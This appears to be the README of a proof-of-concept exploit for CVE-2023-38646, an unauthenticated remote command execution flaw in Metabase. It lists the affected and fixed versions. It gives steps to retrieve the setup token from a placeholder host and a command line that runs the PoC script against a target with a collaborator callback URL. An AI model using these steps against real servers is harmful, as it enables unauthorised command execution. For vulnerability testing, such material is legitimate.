Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
-
Navigate to
http://vulnerablehost.com/api/session/properties
-
Get a collaborator url (Tested with BurpSuite)
-
Run the PoC Script with:
- -u - Target URL
- -t - Setup token
- -c - Collaborator url
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>
- Check your collaborator for any callbacks